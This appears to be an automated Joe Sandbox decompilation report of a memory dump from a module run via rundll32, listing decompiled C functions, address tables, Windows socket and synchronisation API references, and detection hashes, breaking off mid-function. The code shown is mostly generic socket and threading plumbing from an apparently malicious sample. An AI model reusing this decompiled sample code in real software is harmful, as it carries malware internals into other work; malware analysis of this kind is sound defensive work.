                                                            0x0464f534
                                                            0x0464f50a
                                                            0x0464f50a
                                                            0x0464f513
                                                            0x0464f51a
                                                            0x0464f521
                                                            0x0464f52a
                                                            0x0464f52a
                                                            0x0464f4c3
                                                            0x0464f4c3
                                                            0x00000000
                                                            0x0464f4c3
                                                            0x0464f4c1
                                                            0x0464f388
                                                            0x0464f388
                                                            0x0464f38b
                                                            0x0464f38d
                                                            0x0464f390
                                                            0x0464f397
                                                            0x00000000
                                                            0x0464f39e
                                                            0x0464f382
                                                            0x0464f28e
                                                            0x0464f28e
                                                            0x0464f294
                                                            0x0464f29b
                                                            0x0464f2a2
                                                            0x0464f2a5
                                                            0x00000000
                                                            0x0464f2a5
                                                            0x0464f263
                                                            0x0464f26f
                                                            0x00000000
                                                            0x0464f271
                                                            0x0464f273
                                                            0x00000000
                                                            0x0464f273
                                                            0x0464f26f
                                                            0x0464f261
                                                            0x0464f250
                                                            0x0464f252
                                                            0x00000000
                                                            0x0464f252
                                                            0x0464f242
                                                            0x0464f244
                                                            0x0464f278
                                                            0x0464f27a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464f27a
                                                            0x00000000
                                                            0x0464f27c
                                                            0x0464f27e
                                                            0x0464f283
                                                            0x00000000
                                                            0x0464f287
                                                            0x00000000

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F1AC
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F1B0
                                                            • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000,?,00000000), ref: 0464F23C
                                                            • WSAGetLastError.WS2_32(?,00000000), ref: 0464F28E
                                                              • Part of subcall function 0464F610: RtlEnterCriticalSection.NTDLL(?), ref: 0464F644
                                                              • Part of subcall function 0464F610: RtlLeaveCriticalSection.NTDLL(?), ref: 0464F69B
                                                              • Part of subcall function 0464F610: HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0464F6DF
                                                              • Part of subcall function 0464F610: RtlEnterCriticalSection.NTDLL(?), ref: 0464F6F1
                                                              • Part of subcall function 0464F610: RtlLeaveCriticalSection.NTDLL(?), ref: 0464F730
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F2BD
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F2E0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalCurrentSectionThread$EnterLeave$ErrorEventsFreeHeapLastMultipleWait
                                                            • String ID:
                                                            • API String ID: 2095029031-0
                                                            • Opcode ID: db0cb1793fce3ad47f482131cab45e7e29f2ded5c89cb31c53646e3239b70809
                                                            • Instruction ID: 008c8bb243a9e506152eb66fa772d76e863bc7633367c2425a67813317e62a7e
                                                            • Opcode Fuzzy Hash: db0cb1793fce3ad47f482131cab45e7e29f2ded5c89cb31c53646e3239b70809
                                                            • Instruction Fuzzy Hash: DE4149746006059FEB28DFA8C888B6EB7E4BF98314F200A1DD946D7780EB74F9018B95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E046547C0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				intOrPtr _v20;
                                                            				signed int _t26;
                                                            				char* _t29;
                                                            				intOrPtr _t30;
                                                            				void* _t43;
                                                            				intOrPtr _t58;
                                                            				void* _t59;
                                                            				struct _CRITICAL_SECTION* _t61;
                                                            				signed int _t63;
                                                            
                                                            				_t59 = __esi;
                                                            				_t43 = __ebx;
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t26 ^ _t63;
                                                            				_t58 = _a4;
                                                            				_t29 =  &_v12;
                                                            				_v20 = __ecx;
                                                            				_v16 = 4;
                                                            				__imp__#7( *((intOrPtr*)(_t58 + 0x88)), 0xffff, 0x1001, _t29,  &_v16);
                                                            				if(_t29 == 0xffffffff) {
                                                            					L2:
                                                            					_t30 = 0x4000;
                                                            					_v12 = 0x4000;
                                                            				} else {
                                                            					_t30 = _v12;
                                                            					if(_t30 <= 0) {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            				if( *((intOrPtr*)(_t58 + 0x44)) <= _t30) {
                                                            					_push(_t43);
                                                            					_t44 = 0;
                                                            					_push(_t59);
                                                            					if( *((intOrPtr*)(_t58 + 0x40)) <= 0 || InterlockedCompareExchange(_t58 + 0x3c, 0, 1) != 1) {
                                                            						L18:
                                                            						return E04655AFE(_v8 ^ _t63);
                                                            					} else {
                                                            						_t61 = _t58 + 0x6c;
                                                            						EnterCriticalSection(_t61);
                                                            						if( *((intOrPtr*)(_t58 + 0x30)) != 0) {
                                                            							if( *((intOrPtr*)(_t58 + 0x40)) > 0) {
                                                            								_t44 = E04654A50(0, _v20, _t58, _t61, _t58);
                                                            							}
                                                            							 *(_t58 + 0x3c) = 1;
                                                            							LeaveCriticalSection(_t61);
                                                            							if(_t44 != 0x3e5) {
                                                            								if(_t44 != 0 && _t44 != 0x2736 && _t44 != 0x3e3) {
                                                            									E04652920(_v20, _t58, 2, 3, _t44);
                                                            								}
                                                            							} else {
                                                            								if( *(_t58 + 0x3c) != 0) {
                                                            									PostQueuedCompletionStatus( *(_v20 + 0x50), 0xfffffff3,  *(_t58 + 4), 0);
                                                            								}
                                                            							}
                                                            							goto L18;
                                                            						} else {
                                                            							LeaveCriticalSection(_t61);
                                                            							return E04655AFE(_v8 ^ _t63);
                                                            						}
                                                            					}
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t63);
                                                            				}
                                                            			}















                                                            0x046547c0
                                                            0x046547c0
                                                            0x046547c6
                                                            0x046547cd
                                                            0x046547d1
                                                            0x046547d8
                                                            0x046547db
                                                            0x046547ef
                                                            0x046547f6
                                                            0x046547ff
                                                            0x04654808
                                                            0x04654808
                                                            0x0465480d
                                                            0x04654801
                                                            0x04654801
                                                            0x04654806
                                                            0x00000000
                                                            0x00000000
                                                            0x04654806
                                                            0x04654813
                                                            0x04654828
                                                            0x04654829
                                                            0x0465482b
                                                            0x0465482f
                                                            0x046548dc
                                                            0x046548ee
                                                            0x0465484b
                                                            0x0465484b
                                                            0x0465484f
                                                            0x04654858
                                                            0x0465487c
                                                            0x04654887
                                                            0x04654887
                                                            0x0465488a
                                                            0x04654891
                                                            0x0465489d
                                                            0x046548bc
                                                            0x046548d7
                                                            0x046548d7
                                                            0x0465489f
                                                            0x046548a3
                                                            0x046548b2
                                                            0x046548b2
                                                            0x046548a3
                                                            0x00000000
                                                            0x0465485a
                                                            0x0465485b
                                                            0x04654876
                                                            0x04654876
                                                            0x04654858
                                                            0x04654815
                                                            0x04654825
                                                            0x04654825

                                                            APIs
                                                            • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000000), ref: 046547F6
                                                            • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000001), ref: 0465483C
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0465484F
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0465485B
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04654891
                                                            • PostQueuedCompletionStatus.KERNEL32(?,000000F3,00000001,00000000), ref: 046548B2
                                                              • Part of subcall function 04654A50: InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04654ADB
                                                              • Part of subcall function 04654A50: WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04654B0E
                                                              • Part of subcall function 04654A50: WSAGetLastError.WS2_32 ref: 04654B19
                                                              • Part of subcall function 04654A50: InterlockedDecrement.KERNEL32(00000002), ref: 04654B29
                                                              • Part of subcall function 04654A50: HeapFree.KERNEL32(?,00000000,?,?), ref: 04654B59
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(00000054), ref: 04652959
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0465295F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterInterlocked$ExchangeLeave$CompareCompletionDecrementErrorFreeHeapLastPostQueuedSendStatusgetsockopt
                                                            • String ID:
                                                            • API String ID: 2014370420-0
                                                            • Opcode ID: e0f15c8184989f02428c03e1b6d437e3f1bc204ca87597c306116aa9be9736a5
                                                            • Instruction ID: 13f41e302f9797ae6578703885ee4ab248ae6b9408cffe4209ca5743ff3d2b15
                                                            • Opcode Fuzzy Hash: e0f15c8184989f02428c03e1b6d437e3f1bc204ca87597c306116aa9be9736a5
                                                            • Instruction Fuzzy Hash: 8C31A371601149BFEB14DF94D888BBEB378FF14314F00416AED15966A0EF75B9A08B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 97%
                                                            			E0464F610(void* __ecx) {
                                                            				void* _v8;
                                                            				long _t33;
                                                            				void* _t37;
                                                            				long _t39;
                                                            				void* _t40;
                                                            				void* _t44;
                                                            				void* _t53;
                                                            				struct _CRITICAL_SECTION* _t57;
                                                            				struct _CRITICAL_SECTION* _t59;
                                                            
                                                            				_push(__ecx);
                                                            				_t44 = __ecx;
                                                            				_v8 = 0;
                                                            				while( *((intOrPtr*)(_t44 + 0x180)) > 0) {
                                                            					_t57 = _t44 + 0x14c;
                                                            					EnterCriticalSection(_t57);
                                                            					_t53 =  *(_t44 + 0x168);
                                                            					if(_t53 ==  *(_t44 + 0x16c)) {
                                                            						if(_t53 != 0) {
                                                            							 *(_t44 + 0x168) = 0;
                                                            							 *(_t44 + 0x16c) = 0;
                                                            							goto L6;
                                                            						}
                                                            					} else {
                                                            						_t40 =  *(_t53 + 4);
                                                            						 *(_t44 + 0x168) = _t40;
                                                            						 *(_t40 + 8) = 0;
                                                            						L6:
                                                            						if(_t53 != 0) {
                                                            							 *(_t53 + 4) = 0;
                                                            							 *(_t53 + 8) = 0;
                                                            							 *((intOrPtr*)(_t44 + 0x164)) =  *((intOrPtr*)(_t44 + 0x164)) - 1;
                                                            						}
                                                            					}
                                                            					LeaveCriticalSection(_t57);
                                                            					if(_t53 == 0) {
                                                            						break;
                                                            					} else {
                                                            						if(E0464F770(_t44, _t53,  &_v8) == 0) {
                                                            							_t33 = E0464C930(_t44 + 0x84, _t53);
                                                            							if(_t33 == 0) {
                                                            								HeapFree( *( *_t53), _t33, _t53);
                                                            							}
                                                            							return 0;
                                                            						} else {
                                                            							if(_v8 != 0) {
                                                            								_t59 = _t44 + 0x14c;
                                                            								EnterCriticalSection(_t59);
                                                            								_t37 =  *(_t44 + 0x168);
                                                            								if(_t37 == 0) {
                                                            									 *(_t53 + 8) = 0;
                                                            									 *(_t53 + 4) = 0;
                                                            									 *(_t44 + 0x16c) = _t53;
                                                            								} else {
                                                            									 *(_t37 + 8) = _t53;
                                                            									 *(_t53 + 4) =  *(_t44 + 0x168);
                                                            								}
                                                            								 *((intOrPtr*)(_t44 + 0x164)) =  *((intOrPtr*)(_t44 + 0x164)) + 1;
                                                            								 *(_t44 + 0x168) = _t53;
                                                            								LeaveCriticalSection(_t59);
                                                            								break;
                                                            							} else {
                                                            								_t39 = E0464C930(_t44 + 0x84, _t53);
                                                            								if(_t39 == 0) {
                                                            									HeapFree( *( *_t53), _t39, _t53);
                                                            								}
                                                            								continue;
                                                            							}
                                                            						}
                                                            					}
                                                            					L21:
                                                            				}
                                                            				return 1;
                                                            				goto L21;
                                                            			}












                                                            0x0464f616
                                                            0x0464f61a
                                                            0x0464f61c
                                                            0x0464f630
                                                            0x0464f63d
                                                            0x0464f644
                                                            0x0464f64a
                                                            0x0464f656
                                                            0x0464f66c
                                                            0x0464f66e
                                                            0x0464f678
                                                            0x00000000
                                                            0x0464f678
                                                            0x0464f658
                                                            0x0464f658
                                                            0x0464f65b
                                                            0x0464f661
                                                            0x0464f682
                                                            0x0464f684
                                                            0x0464f686
                                                            0x0464f68d
                                                            0x0464f694
                                                            0x0464f694
                                                            0x0464f684
                                                            0x0464f69b
                                                            0x0464f6a3
                                                            0x00000000
                                                            0x0464f6a9
                                                            0x0464f6b8
                                                            0x0464f749
                                                            0x0464f750
                                                            0x0464f758
                                                            0x0464f758
                                                            0x0464f766
                                                            0x0464f6be
                                                            0x0464f6c3
                                                            0x0464f6ea
                                                            0x0464f6f1
                                                            0x0464f6f7
                                                            0x0464f6ff
                                                            0x0464f70f
                                                            0x0464f716
                                                            0x0464f71d
                                                            0x0464f701
                                                            0x0464f701
                                                            0x0464f70a
                                                            0x0464f70a
                                                            0x0464f723
                                                            0x0464f72a
                                                            0x0464f730
                                                            0x00000000
                                                            0x0464f6c5
                                                            0x0464f6cc
                                                            0x0464f6d3
                                                            0x0464f6df
                                                            0x0464f6df
                                                            0x00000000
                                                            0x0464f6d3
                                                            0x0464f6c3
                                                            0x0464f6b8
                                                            0x00000000
                                                            0x0464f6a3
                                                            0x0464f741
                                                            0x00000000

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464F644
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464F69B
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0464F6DF
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464F6F1
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464F730
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0464F758
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeave
                                                            • String ID:
                                                            • API String ID: 3296397286-0
                                                            • Opcode ID: 236dbab94d57b1353cea0e491b683116d264f0088a744fedeb944e5ad17488d6
                                                            • Instruction ID: bac2c08273f8debaae6852a13c62585a77af7c3bec03bf6a3cfe246548edcb41
                                                            • Opcode Fuzzy Hash: 236dbab94d57b1353cea0e491b683116d264f0088a744fedeb944e5ad17488d6
                                                            • Instruction Fuzzy Hash: E3314B71200200AFDB549F05E888BE6B7E8FF99314F0881B9EC0C8B255FB75A855CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E046538F0(intOrPtr* __ecx, int _a8, void* _a12) {
                                                            				intOrPtr* _v8;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				int _t26;
                                                            				void* _t39;
                                                            				int _t51;
                                                            				struct _CRITICAL_SECTION* _t56;
                                                            
                                                            				_push(__ecx);
                                                            				_t54 = __ecx;
                                                            				_t51 = _a8;
                                                            				_v8 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
                                                            					 *((intOrPtr*)(_t51 + 0x38)) = timeGetTime();
                                                            				}
                                                            				_t39 = _a12;
                                                            				_t26 = 0xff;
                                                            				_a8 = 0xff;
                                                            				if(_t51 != 0 &&  *((intOrPtr*)(_t51 + 0x30)) != 0) {
                                                            					_t8 = _t51 + 0x54; // 0x54
                                                            					_t56 = _t8;
                                                            					EnterCriticalSection(_t56);
                                                            					if( *((intOrPtr*)(_t51 + 0x30)) != 0) {
                                                            						SetLastError(0);
                                                            						_a8 =  *((intOrPtr*)( *_v8 + 0xe8))(_t51,  *((intOrPtr*)(_t39 + 0x20)),  *((intOrPtr*)(_t39 + 0x1c)));
                                                            					}
                                                            					LeaveCriticalSection(_t56);
                                                            					_t26 = _a8;
                                                            					_t54 = _v8;
                                                            				}
                                                            				_a8 = _t26;
                                                            				if(_t26 == 0 || _t26 == 1) {
                                                            					if(E046556C0(_t39, _t54, _t51, _t51, _t54, _t39,  &_a8) != 0) {
                                                            						_t19 = _t51 + 0x84; // 0x84
                                                            						E0464EC90(_t19);
                                                            						_t54 = _v8;
                                                            						 *(_t51 + 0x50) = 0;
                                                            						 *(_t51 + 0x84) = 0;
                                                            						E04653AC0(_t39, _v8, _t51, _v8, _t51, _t39);
                                                            					}
                                                            					_t26 = _a8;
                                                            				}
                                                            				if(_t26 == 0xff) {
                                                            					L15:
                                                            					_t26 = E0464C930(_t54 + 0xb0, _t39);
                                                            					if(_t26 == 0) {
                                                            						_t26 = HeapFree( *( *(_t39 + 0x14)), 0, _t39);
                                                            					}
                                                            					goto L17;
                                                            				} else {
                                                            					if(_t26 != 2) {
                                                            						L17:
                                                            						return _t26;
                                                            					}
                                                            					_t31 =  ==  ? 0x4c7 : GetLastError();
                                                            					E04652920(_t54, _t51, 2, 4,  ==  ? 0x4c7 : GetLastError());
                                                            					goto L15;
                                                            				}
                                                            			}











                                                            0x046538f3
                                                            0x046538f6
                                                            0x046538f9
                                                            0x046538fc
                                                            0x04653903
                                                            0x0465390b
                                                            0x0465390b
                                                            0x0465390e
                                                            0x04653911
                                                            0x04653916
                                                            0x0465391b
                                                            0x04653923
                                                            0x04653923
                                                            0x04653927
                                                            0x04653931
                                                            0x04653935
                                                            0x0465394d
                                                            0x0465394d
                                                            0x04653951
                                                            0x04653957
                                                            0x0465395a
                                                            0x0465395a
                                                            0x0465395d
                                                            0x04653962
                                                            0x0465397c
                                                            0x0465397e
                                                            0x04653984
                                                            0x04653989
                                                            0x0465398f
                                                            0x04653997
                                                            0x046539a1
                                                            0x046539a1
                                                            0x046539a6
                                                            0x046539a6
                                                            0x046539ae
                                                            0x046539d2
                                                            0x046539d9
                                                            0x046539e0
                                                            0x046539ea
                                                            0x046539ea
                                                            0x00000000
                                                            0x046539b0
                                                            0x046539b3
                                                            0x046539f0
                                                            0x046539f6
                                                            0x046539f6
                                                            0x046539c2
                                                            0x046539cd
                                                            0x00000000
                                                            0x046539cd

                                                            APIs
                                                            • timeGetTime.WINMM(?,?,?,?,?,0465375E,?,00000000,?,?,?,00000000,?,04653568,?,?), ref: 04653905
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 04653927
                                                            • SetLastError.KERNEL32(00000000,?,0465375E,?,00000000,?,?,?,00000000,?,04653568,?,?,?,?,00000000), ref: 04653935
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04653951
                                                            • GetLastError.KERNEL32 ref: 046539B5
                                                            • HeapFree.KERNEL32(?,00000000,?,?), ref: 046539EA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveTimetime
                                                            • String ID:
                                                            • API String ID: 340097737-0
                                                            • Opcode ID: 5f67767723efc0d6bf9e18cb84dce17b9e269b0fbe435ee52dcaac23034a4998
                                                            • Instruction ID: 2275efe34a72e05bc43ec78c59697814e7d3584b116709b9388f020d1348f668
                                                            • Opcode Fuzzy Hash: 5f67767723efc0d6bf9e18cb84dce17b9e269b0fbe435ee52dcaac23034a4998
                                                            • Instruction Fuzzy Hash: EF316DB1600205ABEB159F69C888BAAB7A8FF54755F108029FD09D7760FB34FD90CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E04637AC0(void* _a4) {
                                                            				intOrPtr _v0;
                                                            				intOrPtr _v4;
                                                            				long _t33;
                                                            				struct _CRITICAL_SECTION* _t39;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            
                                                            				_t16 =  ==  ? 0xc0000017 : 0xc000001d;
                                                            				RaiseException( ==  ? 0xc0000017 : 0xc000001d, 1, 0, 0);
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				_t43 = _t41;
                                                            				_push(_t43);
                                                            				if(_v0 == 0 || _v0 <= 0) {
                                                            					_t33 = 0x57;
                                                            					SetLastError(0x57);
                                                            					goto L12;
                                                            				} else {
                                                            					if( *((intOrPtr*)( *0xc0000017 + 0x40))() == 0) {
                                                            						SetLastError(0x139f);
                                                            						return 0xbadbad;
                                                            					} else {
                                                            						_t39 = 0xffffffffc0000163;
                                                            						EnterCriticalSection(0xffffffffc0000163);
                                                            						if( *((intOrPtr*)( *0xc0000017 + 0x40))() == 0) {
                                                            							_t33 = 0x139f;
                                                            						} else {
                                                            							_t33 = E0464FAD0(0xc0000017, _v4, _v0);
                                                            						}
                                                            						LeaveCriticalSection(_t39);
                                                            						if(_t33 == 0) {
                                                            							L12:
                                                            							return 0 | _t33 == 0x00000000;
                                                            						} else {
                                                            							SetLastError(_t33);
                                                            							return 0 | _t33 == 0x00000000;
                                                            						}
                                                            					}
                                                            				}
                                                            			}









                                                            0x04637ada
                                                            0x04637ade
                                                            0x04637ae4
                                                            0x04637ae5
                                                            0x04637ae6
                                                            0x04637ae7
                                                            0x04637ae8
                                                            0x04637ae9
                                                            0x04637aea
                                                            0x04637aeb
                                                            0x04637aec
                                                            0x04637aed
                                                            0x04637aee
                                                            0x04637aef
                                                            0x04637af3
                                                            0x0464fa30
                                                            0x0464fa3a
                                                            0x0464fab1
                                                            0x0464fab7
                                                            0x00000000
                                                            0x0464fa42
                                                            0x0464fa49
                                                            0x0464fa9f
                                                            0x0464faae
                                                            0x0464fa4b
                                                            0x0464fa4c
                                                            0x0464fa53
                                                            0x0464fa62
                                                            0x0464fa75
                                                            0x0464fa64
                                                            0x0464fa71
                                                            0x0464fa71
                                                            0x0464fa7b
                                                            0x0464fa84
                                                            0x0464fabd
                                                            0x0464fac6
                                                            0x0464fa86
                                                            0x0464fa87
                                                            0x0464fa96
                                                            0x0464fa96
                                                            0x0464fa84
                                                            0x0464fa49

                                                            APIs
                                                            • RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                            • SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                              • Part of subcall function 0464FAD0: SetEvent.KERNEL32(?,?,?,?,?,0464FA71,00000000,00000000,?,?,046383DB,80004005,?,046387F8,04638B6E,00000000), ref: 0464FB2C
                                                            • SetLastError.KERNEL32(0000139F,?,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA9F
                                                            • SetLastError.KERNEL32(00000057,74D0F5E0,?,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FAB7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CriticalSection$EnterEventExceptionLeaveRaise
                                                            • String ID:
                                                            • API String ID: 3848672818-0
                                                            • Opcode ID: 1369604a91b96b111b7b61ff40885e36aaf1aeff8cf35c582970b9f7ef6107a9
                                                            • Instruction ID: 9b7a2d512b9149d63d7d152cc2c709378fc6f973beee7cb8133ee64652e34b23
                                                            • Opcode Fuzzy Hash: 1369604a91b96b111b7b61ff40885e36aaf1aeff8cf35c582970b9f7ef6107a9
                                                            • Instruction Fuzzy Hash: E7119A36300209EBDB085665D80CBBA7B6DDFD4761F05C029F909DB294EF79D89197A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E04653800(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a8, void* _a12) {
                                                            				signed int _v8;
                                                            				long _v12;
                                                            				intOrPtr* _v16;
                                                            				void* _v20;
                                                            				signed int _t22;
                                                            				void* _t26;
                                                            				long _t28;
                                                            				intOrPtr _t35;
                                                            				void* _t47;
                                                            				struct _CRITICAL_SECTION* _t50;
                                                            				signed int _t52;
                                                            
                                                            				_t22 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t22 ^ _t52;
                                                            				_t35 = _a8;
                                                            				_t47 = _a12;
                                                            				_v16 = __ecx;
                                                            				_v20 = _t47;
                                                            				_v12 = 0;
                                                            				__imp__#21( *((intOrPtr*)(_t35 + 0x88)), 0xffff, 0x7010,  &_v12, 4);
                                                            				_t9 = _t35 + 0x54; // 0x54
                                                            				_t50 = _t9;
                                                            				 *((intOrPtr*)(_t35 + 0x48)) = 1;
                                                            				EnterCriticalSection(_t50);
                                                            				if( *((intOrPtr*)(_t35 + 0x30)) != 0) {
                                                            					SetLastError(0);
                                                            					_t26 =  *((intOrPtr*)( *_v16 + 0xdc))(_t35);
                                                            					_t48 = _t26;
                                                            					LeaveCriticalSection(_t50);
                                                            					if(_t26 == 2) {
                                                            						_t47 = _v20;
                                                            						goto L5;
                                                            					} else {
                                                            						E04653AC0(_t35, _v16, _t48, _t50, _t35, _v20);
                                                            						return E04655AFE(_v8 ^ _t52);
                                                            					}
                                                            				} else {
                                                            					LeaveCriticalSection(_t50);
                                                            					L5:
                                                            					E04652920(_v16, _t35, 0, 0, 0);
                                                            					_t28 = E0464C930(_v16 + 0xb0, _t47);
                                                            					if(_t28 == 0) {
                                                            						HeapFree( *( *(_t47 + 0x14)), _t28, _t47);
                                                            					}
                                                            					return E04655AFE(_v8 ^ _t52);
                                                            				}
                                                            			}














                                                            0x04653806
                                                            0x0465380d
                                                            0x04653811
                                                            0x04653819
                                                            0x0465382f
                                                            0x04653832
                                                            0x04653835
                                                            0x0465383c
                                                            0x04653842
                                                            0x04653842
                                                            0x04653845
                                                            0x0465384d
                                                            0x04653857
                                                            0x04653864
                                                            0x04653870
                                                            0x04653877
                                                            0x04653879
                                                            0x04653882
                                                            0x046538a3
                                                            0x00000000
                                                            0x04653884
                                                            0x0465388b
                                                            0x046538a0
                                                            0x046538a0
                                                            0x04653859
                                                            0x0465385a
                                                            0x046538a6
                                                            0x046538b2
                                                            0x046538be
                                                            0x046538c5
                                                            0x046538ce
                                                            0x046538ce
                                                            0x046538e4
                                                            0x046538e4

                                                            APIs
                                                            • setsockopt.WS2_32(?,0000FFFF,00007010,?,00000004), ref: 0465383C
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 0465384D
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 0465385A
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(00000054), ref: 04652959
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0465295F
                                                            • SetLastError.KERNEL32(00000000), ref: 04653864
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04653879
                                                            • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 046538CE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Enter$Leave$ErrorFreeHeapLastsetsockopt
                                                            • String ID:
                                                            • API String ID: 773220702-0
                                                            • Opcode ID: de9e89f20ecde79aff828e8dbcceb534a22244fff6ac88834465794f7fb5fab5
                                                            • Instruction ID: df544d239f3633b470f81a849bed7d1e841570ed0f28a2f081d84d7321b6da52
                                                            • Opcode Fuzzy Hash: de9e89f20ecde79aff828e8dbcceb534a22244fff6ac88834465794f7fb5fab5
                                                            • Instruction Fuzzy Hash: F9217F75A00209EBDB149F99DC88FAEB7B9FF58710F004069ED06A7391EB746944CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E04644000(intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				void _v1036;
                                                            				void _v1037;
                                                            				void* _v1040;
                                                            				intOrPtr _v1044;
                                                            				intOrPtr _v1056;
                                                            				char _v1060;
                                                            				intOrPtr _v1061;
                                                            				long _v1064;
                                                            				long _v1065;
                                                            				long _v1068;
                                                            				long _v1069;
                                                            				signed int _t26;
                                                            				void* _t48;
                                                            				void* _t55;
